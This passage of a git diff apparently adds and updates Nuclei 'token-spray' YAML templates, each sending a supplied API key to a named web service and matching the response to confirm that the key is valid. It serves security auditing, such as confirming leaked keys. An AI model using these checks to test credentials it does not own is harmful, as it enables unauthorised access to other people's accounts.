+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 201
+
+      - type: word
+        part: body
+        words:
+          - '"name"'
diff --git a/token-spray/api-harvardart.yaml b/token-spray/api-harvardart.yaml
index 7b2f15b76f..fe74a12666 100644
--- a/token-spray/api-harvardart.yaml
+++ b/token-spray/api-harvardart.yaml
@@ -4,9 +4,10 @@ info:
   name: Harvard Art Museums API Test
   author: daffainfo
   severity: info
+  description: Harvard Art
   reference:
     - https://github.com/harvardartmuseums/api-docs
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Harvard%20Art%20Museums.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/harvard-art-museums
   tags: token-spray,harvardart
 
 self-contained: true
diff --git a/token-spray/api-hirak-rates.yaml b/token-spray/api-hirak-rates.yaml
index 73dba1c798..6d61403334 100644
--- a/token-spray/api-hirak-rates.yaml
+++ b/token-spray/api-hirak-rates.yaml
@@ -4,9 +4,10 @@ info:
   name: Hirak Exchange Rates API Test
   author: daffainfo
   severity: info
+  description: Exchange rates between 162 currency & 300 crypto currency update each 5 min, accurate, no limits
   reference:
     - https://rates.hirak.site/
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Hirak%20Exchange%20Rates.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/hirak-exchange-rates
   tags: token-spray,hirak
 
 self-contained: true
diff --git a/token-spray/api-holidayapi.yaml b/token-spray/api-holidayapi.yaml
index f7bb602b60..1c59ed9919 100644
--- a/token-spray/api-holidayapi.yaml
+++ b/token-spray/api-holidayapi.yaml
@@ -4,9 +4,10 @@ info:
   name: Holiday API Test
   author: daffainfo
   severity: info
+  description: Historical data regarding holidays
   reference:
     - https://holidayapi.com/docs
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Calendar/Holiday%20API.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/holiday-api
   tags: token-spray,holidayapi
 
 self-contained: true
diff --git a/token-spray/api-host-io.yaml b/token-spray/api-host-io.yaml
new file mode 100644
index 0000000000..bd0ca1f244
--- /dev/null
+++ b/token-spray/api-host-io.yaml
@@ -0,0 +1,26 @@
+id: api-host-io
+
+info:
+  name: host.io API Test
+  author: daffainfo
+  severity: info
+  description: Domains Data API for Developers
+  reference:
+    - https://host.io/docs
+    - https://github.com/daffainfo/all-about-apikey/tree/main/host-io
+  tags: token-spray,hostio
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "https://host.io/api/full/facebook.com?token=${{token}}"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"domain"'
+          - '"rank"'
+          - '"url"'
+        condition: and
diff --git a/token-spray/api-html2pdf.yaml b/token-spray/api-html2pdf.yaml
new file mode 100644
index 0000000000..b228ecff8b
--- /dev/null
+++ b/token-spray/api-html2pdf.yaml
@@ -0,0 +1,23 @@
+id: api-html2pdf
+
+info:
+  name: Html2PDF API Test
+  author: daffainfo
+  severity: info
+  description: HTML/URL to PDF
+  reference:
+    - https://html2pdf.app/documentation/
+    - https://github.com/daffainfo/all-about-apikey/tree/main/html2pdf
+  tags: token-spray,html2pdf
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "https://api.html2pdf.app/v1/generate?url=https://test.test&apiKey={{token}}"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"Provided url is not accessible"'
diff --git a/token-spray/api-hunter.yaml b/token-spray/api-hunter.yaml
new file mode 100644
index 0000000000..429485a134
--- /dev/null
+++ b/token-spray/api-hunter.yaml
@@ -0,0 +1,26 @@
+id: api-hunter
+
+info:
+  name: Hunter API Test
+  author: daffainfo
+  severity: info
+  description: API for domain search, professional email finder, author finder and email verifier
+  reference:
+    - https://hunter.io/api-documentation/v2
+    - https://github.com/daffainfo/all-about-apikey/tree/main/hunter
+  tags: token-spray,hunter
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "https://api.hunter.io/v2/domain-search?domain=stripe.com&api_key={{token}}"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"domain"'
+          - '"disposable"'
+          - '"webmail"'
+        condition: and
diff --git a/token-spray/api-iconfinder.yaml b/token-spray/api-iconfinder.yaml
index 31069943c2..12e6f2d822 100644
--- a/token-spray/api-iconfinder.yaml
+++ b/token-spray/api-iconfinder.yaml
@@ -4,9 +4,10 @@ info:
   name: IconFinder API Test
   author: daffainfo
   severity: info
+  description: Web Icons
   reference:
     - https://developer.iconfinder.com/reference/overview-1
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/IconFinder.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/iconfinder
   tags: token-spray,iconfinder
 
 self-contained: true
diff --git a/token-spray/api-improvmx.yaml b/token-spray/api-improvmx.yaml
index 1b6f7e7986..fb6c00f0d9 100644
--- a/token-spray/api-improvmx.yaml
+++ b/token-spray/api-improvmx.yaml
@@ -4,9 +4,10 @@ info:
   name: ImprovMX API Test
   author: daffainfo
   severity: info
+  description: API for free email forwarding service
   reference:
     - https://improvmx.com/api
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Business/ImprovMX.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/improvmx
   tags: token-spray,improvmx
 
 self-contained: true
diff --git a/token-spray/api-instatus.yaml b/token-spray/api-instatus.yaml
index 40ac71ae96..1175f1b8b3 100644
--- a/token-spray/api-instatus.yaml
+++ b/token-spray/api-instatus.yaml
@@ -4,9 +4,10 @@ info:
   name: Instatus API Test
   author: daffainfo
   severity: info
+  description: Post to and update maintenance and incidents on your status page through an HTTP REST API
   reference:
     - https://instatus.com/help/api
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Business/Instatus.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/instatus
   tags: token-spray,instatus
 
 self-contained: true
diff --git a/token-spray/api-intelx.yaml b/token-spray/api-intelx.yaml
new file mode 100644
index 0000000000..609237bf4a
--- /dev/null
+++ b/token-spray/api-intelx.yaml
@@ -0,0 +1,32 @@
+id: api-intelx
+
+info:
+  name: Intelligence X API Test
+  author: 0ri2N
+  severity: info
+  description: |
+    Intelligence X is a search engine and data archive. Search Tor, I2P, data leaks and the public web by email, domain, IP, CIDR, Bitcoin address and more.
+  reference:
+    - https://intelx.io
+    - https://github.com/IntelligenceX/SDK
+    - https://github.com/IntelligenceX/SDK/blob/master/Intelligence%20X%20API.pdf
+    - https://intelx.io/account?tab=developer
+  tags: dns,scan,recon,intelx,token-spray
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - https://2.intelx.io/authenticate/info
+    headers:
+      X-Key: "{{token}}"
+      User-Agent: Nuclei (+https://nuclei.projectdiscovery.io)
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'added'
+          - 'preview'
+          - 'buckets'
+        condition: and
diff --git a/token-spray/api-ip2whois.yaml b/token-spray/api-ip2whois.yaml
new file mode 100644
index 0000000000..8103ce599f
--- /dev/null
+++ b/token-spray/api-ip2whois.yaml
@@ -0,0 +1,26 @@
+id: api-ip2whois
+
+info:
+  name: IP2WHOIS API Test
+  author: daffainfo
+  severity: info
+  description: WHOIS domain name lookup
+  reference:
+    - https://www.ip2whois.com/developers-api
+    - https://github.com/daffainfo/all-about-apikey/tree/main/ip2whois
+  tags: token-spray,ip2whois
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "https://api.ip2whois.com/v2?key={{token}}&domain=daffa.tech&format=json"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"domain"'
+          - '"domain_id"'
+          - '"whois_server"'
+        condition: and
diff --git a/token-spray/api-ipfind.yaml b/token-spray/api-ipfind.yaml
new file mode 100644
index 0000000000..38aef171e0
--- /dev/null
+++ b/token-spray/api-ipfind.yaml
@@ -0,0 +1,26 @@
+id: api-ipfind
+
+info:
+  name: IPFind API Test
+  author: daffainfo
+  severity: info
+  description: Geographic location of an IP address or any domain name along with some other useful information
+  reference:
+    - https://ipfind.io/documentation
+    - https://github.com/daffainfo/all-about-apikey/tree/main/ipfind
+  tags: token-spray,ipfind
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "https://app.ipfind.io/api/iplocation?apikey={{token}}"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"continent"'
+          - '"country"'
+          - '"zipCode"'
+        condition: and
diff --git a/token-spray/api-iucn.yaml b/token-spray/api-iucn.yaml
index 71f3e53bb5..3eeb41fa2b 100644
--- a/token-spray/api-iucn.yaml
+++ b/token-spray/api-iucn.yaml
@@ -4,9 +4,10 @@ info:
   name: IUCN API Test
   author: daffainfo
   severity: info
+  description: IUCN Red List of Threatened Species
   reference:
     - http://apiv3.iucnredlist.org/api/v3/docs
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Animals/IUCN.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/iucn
   tags: token-spray,iucn
 
 self-contained: true
diff --git a/token-spray/api-jsonbin.yaml b/token-spray/api-jsonbin.yaml
new file mode 100644
index 0000000000..2a14309c8b
--- /dev/null
+++ b/token-spray/api-jsonbin.yaml
@@ -0,0 +1,28 @@
+id: api-jsonbin
+
+info:
+  name: JSONBin API Test
+  author: daffainfo
+  severity: info
+  description: Free JSON storage service. Ideal for small scale Web apps, Websites and Mobile apps
+  reference:
+    - https://jsonbin.io/api-reference
+    - https://github.com/daffainfo/all-about-apikey/tree/main/jsonbin
+  tags: token-spray,jsonbin
+
+self-contained: true
+requests:
+  - raw:
+      - |
+        GET https://api.jsonbin.io/v3/c HTTP/1.1
+        Host: api.jsonbin.io
+        X-Master-key: {{token}}
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"record"'
+          - '"collectionMeta"'
+          - '"schemaDocId"'
+        condition: and
diff --git a/token-spray/api-lob.yaml b/token-spray/api-lob.yaml
new file mode 100644
index 0000000000..acdb6a64d8
--- /dev/null
+++ b/token-spray/api-lob.yaml
@@ -0,0 +1,28 @@
+id: api-lob
+
+info:
+  name: Lob API Test
+  author: daffainfo
+  severity: info
+  description: US Address Verification
+  reference:
+    - https://docs.lob.com/
+    - https://github.com/daffainfo/all-about-apikey/tree/main/lob
+  tags: token-spray,lob
+
+self-contained: true
+requests:
+  - raw:
+      - |
+        GET https://api.lob.com/v1/addresses HTTP/1.1
+        Authorization: Basic {{base64(token + ':')}}
+        Host: api.lob.com
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"id"'
+          - '"description"'
+          - '"name"'
+        condition: and
\ No newline at end of file
diff --git a/token-spray/api-mac-address-lookup.yaml b/token-spray/api-mac-address-lookup.yaml
new file mode 100644
index 0000000000..aa2f53074c
--- /dev/null
+++ b/token-spray/api-mac-address-lookup.yaml
@@ -0,0 +1,26 @@
+id: api-mac-address-lookup
+
+info:
+  name: MAC Address Lookup API Test
+  author: daffainfo
+  severity: info
+  description: Retrieve vendor details and other information regarding a given MAC address or an OUI
+  reference:
+    - https://macaddress.io/api
+    - https://github.com/daffainfo/all-about-apikey/tree/main/mac-address-lookup
+  tags: token-spray,macaddresslookup
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "https://api.macaddress.io/v1?apiKey={{token}}&output=json&search=44:38:39:ff:ef:57"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"vendorDetails"'
+          - '"companyName"'
+          - '"companyAddress"'
+        condition: and
diff --git a/token-spray/api-mailboxvalidator.yaml b/token-spray/api-mailboxvalidator.yaml
index 0c2d1ec9d6..3a28d008fb 100644
--- a/token-spray/api-mailboxvalidator.yaml
+++ b/token-spray/api-mailboxvalidator.yaml
@@ -4,9 +4,10 @@ info:
   name: MailboxValidator API Test
   author: daffainfo
   severity: info
+  description: Validate email address to improve deliverability
   reference:
     - https://www.mailboxvalidator.com/api-email-free
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Business/MailboxValidator.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/mailboxvalidator
   tags: token-spray,mailboxvalidator
 
 self-contained: true
diff --git a/token-spray/api-mailgun.yaml b/token-spray/api-mailgun.yaml
index 4d8e9307e1..2d8ea12138 100644
--- a/token-spray/api-mailgun.yaml
+++ b/token-spray/api-mailgun.yaml
@@ -4,8 +4,10 @@ info:
   name: Mailgun API Test
   author: zzeitlin
   severity: info
+  description: Email Service
   reference:
     - https://documentation.mailgun.com/en/latest/api-intro.html
+    - https://github.com/daffainfo/all-about-apikey/tree/main/mailgun
   tags: token-spray,mailgun
 
 self-contained: true
diff --git a/token-spray/api-malshare.yaml b/token-spray/api-malshare.yaml
index b1108b4e33..3f25d321ad 100644
--- a/token-spray/api-malshare.yaml
+++ b/token-spray/api-malshare.yaml
@@ -4,9 +4,10 @@ info:
   name: MalShare API Test
   author: daffainfo
   severity: info
+  description: Malware Archive / file sourcing
   reference:
     - https://malshare.com/doc.php
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/MalShare.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/malshare
   tags: token-spray,malshare
 
 self-contained: true
diff --git a/token-spray/api-malwarebazaar.yaml b/token-spray/api-malwarebazaar.yaml
index ce99bd0a43..d8b0e944e1 100644
--- a/token-spray/api-malwarebazaar.yaml
+++ b/token-spray/api-malwarebazaar.yaml
@@ -4,9 +4,10 @@ info:
   name: MalwareBazaar API Test
   author: daffainfo
   severity: info
+  description: Collect and share malware samples
   reference:
     - https://bazaar.abuse.ch/api/
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/MalwareBazaar.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/malwarebazaar
   tags: token-spray,malwarebazaar
 
 self-contained: true
diff --git a/token-spray/api-micro-user-service.yaml b/token-spray/api-micro-user-service.yaml
index a50d5c1436..eba8c4341a 100644
--- a/token-spray/api-micro-user-service.yaml
+++ b/token-spray/api-micro-user-service.yaml
@@ -4,9 +4,10 @@ info:
   name: Micro User Service API Test
   author: daffainfo
   severity: info
+  description: User management and authentication
   reference:
     - https://m3o.com/user
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Authentication/Micro%20User%20Service.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/micro-user-service
   tags: token-spray,micro-user-service
 
 self-contained: true
diff --git a/token-spray/api-mojoauth.yaml b/token-spray/api-mojoauth.yaml
index f6cafe6873..db56c9a9bc 100644
--- a/token-spray/api-mojoauth.yaml
+++ b/token-spray/api-mojoauth.yaml
@@ -4,9 +4,10 @@ info:
   name: MojoAuth API Test
   author: daffainfo
   severity: info
+  description: Secure and modern passwordless authentication platform
   reference:
     - https://mojoauth.com/docs/
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Authentication/MojoAuth.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/mojoauth
   tags: token-spray,mojoauth
 
 self-contained: true
@@ -16,6 +17,7 @@ requests:
         POST https://api.mojoauth.com/token/jwks HTTP/1.1
         Host: api.mojoauth.com
         X-API-Key: {{token}}
+
     matchers:
       - type: word
         part: body
diff --git a/token-spray/api-monday.yaml b/token-spray/api-monday.yaml
new file mode 100644
index 0000000000..8f4a8df402
--- /dev/null
+++ b/token-spray/api-monday.yaml
@@ -0,0 +1,31 @@
+id: api-monday
+
+info:
+  name: Monday API Test
+  author: daffainfo
+  severity: info
+  description: Programmatically access and update data inside a monday.com account
+  reference:
+    - https://api.developer.monday.com/docs
+    - https://github.com/daffainfo/all-about-apikey/tree/main/monday
+  tags: token-spray,monday
+
+self-contained: true
+requests:
+  - raw:
+      - |
+        POST https://api.monday.com/v2 HTTP/1.1
+        Host: api.monday.com
+        Authorization: {{token}}
+        Content-Type: application/json
+
+        {"query": "query { me { is_guest created_at name id}}"}
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"me"'
+          - '"name"'
+          - '"account_id"'
+        condition: and
diff --git a/token-spray/api-myanimelist.yaml b/token-spray/api-myanimelist.yaml
index d7fb301f08..8f7ccab810 100644
--- a/token-spray/api-myanimelist.yaml
+++ b/token-spray/api-myanimelist.yaml
@@ -4,9 +4,10 @@ info:
   name: MyAnimeList API Test
   author: daffainfo
   severity: info
+  description: Anime and Manga Database and Community
   reference:
     - https://myanimelist.net/apiconfig/references/api/v2
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Anime/MyAnimeList.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/myanimelist
   tags: token-spray,myanimelist
 
 self-contained: true
diff --git a/token-spray/api-mywot.yaml b/token-spray/api-mywot.yaml
index 2440afe842..4a1010de79 100644
--- a/token-spray/api-mywot.yaml
+++ b/token-spray/api-mywot.yaml
@@ -4,9 +4,10 @@ info:
   name: My Web of Trust API
   author: daffainfo
   severity: info
+  description: IP/domain/URL reputation
   reference:
     - https://support.mywot.com/hc/en-us/sections/360004477734-API-
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/Web%20of%20Trust.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/web-of-trust
   tags: token-spray,weboftrust
 
 self-contained: true
diff --git a/token-spray/api-nownodes.yaml b/token-spray/api-nownodes.yaml
index 073ed83e17..076c7daebb 100644
--- a/token-spray/api-nownodes.yaml
+++ b/token-spray/api-nownodes.yaml
@@ -4,9 +4,10 @@ info:
   name: Nownodes API Test
   author: daffainfo
   severity: info
+  description: Blockchain-as-a-service solution that provides high-quality connection via API
   reference:
     - https://nownodes.io/
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Blockchain/Nownodes.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/nownodes
   tags: token-spray,nownodes
 
 self-contained: true
diff --git a/token-spray/api-open-page-rank.yaml b/token-spray/api-open-page-rank.yaml
new file mode 100644
index 0000000000..86312c9bbc
--- /dev/null
+++ b/token-spray/api-open-page-rank.yaml
@@ -0,0 +1,28 @@
+id: api-open-page-rank
+
+info:
+  name: Open Page Rank API Test
+  author: daffainfo
+  severity: info
+  description: API for calculating and comparing metrics of different websites using Page Rank algorithm
+  reference:
+    - https://www.domcop.com/openpagerank/documentation
+    - https://github.com/daffainfo/all-about-apikey/tree/main/open-page-rank
+  tags: token-spray,openpagerank
+
+self-contained: true
+requests:
+  - raw:
+      - |
+        GET https://openpagerank.com/api/v1.0/getPageRank?domains[]=google.com HTTP/1.1
+        Host: openpagerank.com
+        API-OPR: {{token}}
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"page_rank_integer"'
+          - '"page_rank_decimal"'
+          - '"rank"'
+        condition: and
diff --git a/token-spray/api-opengraphr.yaml b/token-spray/api-opengraphr.yaml
new file mode 100644
index 0000000000..e2a071e100
--- /dev/null
+++ b/token-spray/api-opengraphr.yaml
@@ -0,0 +1,26 @@
+id: api-opengraphr
+
+info:
+  name: OpenGraphr API Test
+  author: daffainfo
+  severity: info
+  description: Really simple API to retrieve Open Graph data from an URL
+  reference:
+    - https://opengraphr.com/docs/1.0/overview
+    - https://github.com/daffainfo/all-about-apikey/tree/main/opengraphr
+  tags: token-spray,opengraphr
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "https://api.opengraphr.com/v1/og?api_token={{token}}&url=https://google.com"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"title"'
+          - '"image"'
+          - '"url"'
+        condition: and
diff --git a/token-spray/api-orbintelligence.yaml b/token-spray/api-orbintelligence.yaml
index 056bf8608f..9066707d70 100644
--- a/token-spray/api-orbintelligence.yaml
+++ b/token-spray/api-orbintelligence.yaml
@@ -4,9 +4,10 @@ info:
   name: ORB Intelligence API Test
   author: daffainfo
   severity: info
+  description: Company lookup
   reference:
     - https://api.orb-intelligence.com/docs/
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Business/ORB%20Intelligence.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/orb-intelligence
   tags: token-spray,orbintelligence
 
 self-contained: true
diff --git a/token-spray/api-pagecdn.yaml b/token-spray/api-pagecdn.yaml
new file mode 100644
index 0000000000..61a332f1ea
--- /dev/null
+++ b/token-spray/api-pagecdn.yaml
@@ -0,0 +1,25 @@
+id: api-pagecdn
+
+info:
+  name: PageCDN API Test
+  author: daffainfo
+  severity: info
+  description: Public API for javascript, css and font libraries on PageCDN
+  reference:
+    - https://pagecdn.com/docs/public-api
+    - https://github.com/daffainfo/all-about-apikey/tree/main/pagecdn
+  tags: token-spray,pagecdn
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "https://pagecdn.com/api/v2/private/account/info?apikey={{token}}"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"username"'
+          - '"email"'
+        condition: and
diff --git a/token-spray/api-pastebin.yaml b/token-spray/api-pastebin.yaml
index 143f639fb1..ab46ebbc09 100644
--- a/token-spray/api-pastebin.yaml
+++ b/token-spray/api-pastebin.yaml
@@ -4,9 +4,10 @@ info:
   name: Pastebin API Test
   author: daffainfo
   severity: info
+  description: Plain Text Storage
   reference:
     - https://pastebin.com/doc_api
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Cloud%20Storage%20-%20File%20Sharing/Pastebin.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/pastebin
   tags: token-spray,pastebin
 
 self-contained: true
diff --git a/token-spray/api-pdflayer.yaml b/token-spray/api-pdflayer.yaml
new file mode 100644
index 0000000000..141841d77c
--- /dev/null
+++ b/token-spray/api-pdflayer.yaml
@@ -0,0 +1,26 @@
+id: api-pdflayer
+
+info:
+  name: pdflayer API Test
+  author: daffainfo
+  severity: info
+  description: HTML/URL to PDF
+  reference:
+    - https://pdflayer.com/documentation
+    - https://github.com/daffainfo/all-about-apikey/tree/main/pdflayer
+  tags: token-spray,pdflayer
+
+self-contained: true
+requests:
+  - raw:
+      - |
+        GET https://api.pdflayer.com/api/convert?access_key={{token}}&document_url=https://test.test HTTP/1.1
+        Host: api.pdflayer.com
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"document_url_not_found"'
+          - '"The document URL you specified was not found.'
+        condition: and
diff --git a/token-spray/api-petfinder.yaml b/token-spray/api-petfinder.yaml
index 17fd3a85c3..ae0b6866a1 100644
--- a/token-spray/api-petfinder.yaml
+++ b/token-spray/api-petfinder.yaml
@@ -4,9 +4,10 @@ info:
   name: Petfinder API Test
   author: daffainfo
   severity: info
+  description: Petfinder is dedicated to helping pets find homes, another resource to get pets adopted
   reference:
     - https://www.petfinder.com/developers/v2/docs/
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Animals/Petfinder.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/petfinder
   tags: token-spray,petfinder
 
 self-contained: true
diff --git a/token-spray/api-pinata.yaml b/token-spray/api-pinata.yaml
index f34ec36837..89660d1f6e 100644
--- a/token-spray/api-pinata.yaml
+++ b/token-spray/api-pinata.yaml
@@ -4,9 +4,10 @@ info:
   name: Pinata API Test
   author: daffainfo
   severity: info
+  description: IPFS Pinning Services API
   reference:
     - https://docs.pinata.cloud/
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Cloud%20Storage%20-%20File%20Sharing/Pinata.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/pinata
   tags: token-spray,pinata
 
 self-contained: true
diff --git a/token-spray/api-prexview.yaml b/token-spray/api-prexview.yaml
new file mode 100644
index 0000000000..8d9b95589b
--- /dev/null
+++ b/token-spray/api-prexview.yaml
@@ -0,0 +1,27 @@
+id: api-prexview
+
+info:
+  name: PrexView API Test
+  author: daffainfo
+  severity: info
+  description: Data from XML or JSON to PDF, HTML or Image
+  reference:
+    - https://prexview.com/docs/
+    - https://github.com/daffainfo/all-about-apikey/tree/main/prexview
+  tags: token-spray,prexview
+
+self-contained: true
+requests:
+  - raw:
+      - |
+        POST https://api.prexview.com/v1/transform HTTP/1.1
+        Host: api.prexview.com
+        Authorization: {{token}}
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"output is a required argument"'
+          - '"status":400'
+        condition: and
diff --git a/token-spray/api-proxycrawl.yaml b/token-spray/api-proxycrawl.yaml
new file mode 100644
index 0000000000..37e1821aa5
--- /dev/null
+++ b/token-spray/api-proxycrawl.yaml
@@ -0,0 +1,26 @@
+id: api-proxycrawl
+
+info:
+  name: ProxyCrawl API Test
+  author: daffainfo
+  severity: info
+  description: Scraping and crawling anticaptcha service
+  reference:
+    - https://proxycrawl.com/docs/
+    - https://github.com/daffainfo/all-about-apikey/tree/main/proxycrawl
+  tags: token-spray,proxycrawl
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "https://api.proxycrawl.com/leads?token={{token}}&domain=www.amazon.com"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"remaining_requests"'
+          - '"domain"'
+          - '"leads"'
+        condition: and
diff --git a/token-spray/api-proxykingdom.yaml b/token-spray/api-proxykingdom.yaml
new file mode 100644
index 0000000000..35ddc84301
--- /dev/null
+++ b/token-spray/api-proxykingdom.yaml
@@ -0,0 +1,26 @@
+id: api-proxykingdom
+
+info:
+  name: ProxyKingdom API Test
+  author: daffainfo
+  severity: info
+  description: Rotating Proxy API that produces a working proxy on every request
+  reference:
+    - https://proxykingdom.com/documentation
+    - https://github.com/daffainfo/all-about-apikey/tree/main/proxykingdom
+  tags: token-spray,proxykingdom
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "https://api.proxykingdom.com/proxy?token={{token}}"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"address"'
+          - '"port"'
+          - '"protocol"'
+        condition: and
diff --git a/token-spray/api-quip.yaml b/token-spray/api-quip.yaml
index bb21c29c72..70239345aa 100644
--- a/token-spray/api-quip.yaml
+++ b/token-spray/api-quip.yaml
@@ -4,9 +4,10 @@ info:
   name: Quip API Test
   author: daffainfo
   severity: info
+  description: File Sharing and Storage for groups
   reference:
     - https://quip.com/dev/automation/documentation
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Cloud%20Storage%20-%20File%20Sharing/Quip.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/quip
   tags: token-spray,quip
 
 self-contained: true
diff --git a/token-spray/api-rijksmuseum.yaml b/token-spray/api-rijksmuseum.yaml
index 6e6c1c40cd..d4d3a95637 100644
--- a/token-spray/api-rijksmuseum.yaml
+++ b/token-spray/api-rijksmuseum.yaml
@@ -4,9 +4,10 @@ info:
   name: Rijksmuseum API Test
   author: daffainfo
   severity: info
+  description: The Rijksmuseum is a Dutch national museum dedicated to arts and history in Amsterdam
   reference:
     - https://data.rijksmuseum.nl/user-generated-content/api/
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Rijksmuseum.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/rijksmuseum
   tags: token-spray,rijksmuseum
 
 self-contained: true
diff --git a/token-spray/api-savepage.yaml b/token-spray/api-savepage.yaml
new file mode 100644
index 0000000000..a75fabd12a
--- /dev/null
+++ b/token-spray/api-savepage.yaml
@@ -0,0 +1,23 @@
+id: api-savepage
+
+info:
+  name: SavePage API Test
+  author: daffainfo
+  severity: info
+  description: A free, RESTful API used to screenshot any desktop, or mobile website
+  reference:
+    - https://docs.savepage.io
+    - https://github.com/daffainfo/all-about-apikey/tree/main/savepage
+  tags: token-spray,savepage
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "https://api.savepage.io/v1?key={{token}}&q=https://selfcontained.test"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'getaddrinfo ENOTFOUND selfcontained.test'
diff --git a/token-spray/api-scanii.yaml b/token-spray/api-scanii.yaml
index a50bcb42a1..f6571ec0f4 100644
--- a/token-spray/api-scanii.yaml
+++ b/token-spray/api-scanii.yaml
@@ -4,9 +4,10 @@ info:
   name: Scanii API Test
   author: daffainfo
   severity: info
+  description: Simple REST API that can scan submitted documents/files for the presence of threats
   reference:
     - https://docs.scanii.com/v2.1/resources.html
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/Scanii.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/scanii
   tags: token-spray,scanii
 
 self-contained: true
diff --git a/token-spray/api-scraperapi.yaml b/token-spray/api-scraperapi.yaml
new file mode 100644
index 0000000000..cd56996783
--- /dev/null
+++ b/token-spray/api-scraperapi.yaml
@@ -0,0 +1,26 @@
+id: api-scraperapi
+
+info:
+  name: ScraperAPI API Test
+  author: daffainfo
+  severity: info
+  description: Easily build scalable web scrapers
+  reference:
+    - https://www.scraperapi.com/documentation/
+    - https://github.com/daffainfo/all-about-apikey/tree/main/scraperapi
+  tags: token-spray,scraperapi
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "http://api.scraperapi.com/account?api_key={{token}}"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"concurrencyLimit"'
+          - '"concurrentRequests"'
+          - '"requestLimit"'
+        condition: and
diff --git a/token-spray/api-scraperbox.yaml b/token-spray/api-scraperbox.yaml
new file mode 100644
index 0000000000..9befe631ca
--- /dev/null
+++ b/token-spray/api-scraperbox.yaml
@@ -0,0 +1,28 @@
+id: api-scraperbox
+
+info:
+  name: ScraperBox API Test
+  author: daffainfo
+  severity: info
+  description: Undetectable web scraping API
+  reference:
+    - https://scraperbox.com/documentation
+    - https://github.com/daffainfo/all-about-apikey/tree/main/scraperbox
+  tags: token-spray,scraperbox
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "https://api.scraperbox.com/scrape?token={{token}}&url=https://example.com"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 304
+
+      - type: word
+        part: body
+        words:
+          - '<title>Example Domain</title>'
diff --git a/token-spray/api-scrapestack.yaml b/token-spray/api-scrapestack.yaml
new file mode 100644
index 0000000000..b2f5e37dc0
--- /dev/null
+++ b/token-spray/api-scrapestack.yaml
@@ -0,0 +1,23 @@
+id: api-scrapestack
+
+info:
